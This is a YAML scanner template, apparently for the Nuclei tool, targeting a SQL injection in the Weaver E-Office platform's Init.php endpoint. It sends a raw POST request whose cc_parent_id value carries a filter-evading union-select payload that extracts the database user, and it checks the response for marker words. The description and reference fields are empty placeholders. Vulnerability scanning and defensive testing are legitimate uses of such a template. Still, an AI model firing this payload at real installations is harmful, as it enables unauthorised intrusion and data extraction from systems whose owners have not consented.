id: fanwei_eoffice_init_sqli
info:
  name: 泛微 E-Office协同办公平台Init.php SQL注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |-
        POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Length: 60
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate
        Connection: close

        cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words: 
          - CC_VALUE
      - type: word
        part: body
        words: 
          - CC_NAME
      - type: word
        part: header
        words:
          - '200'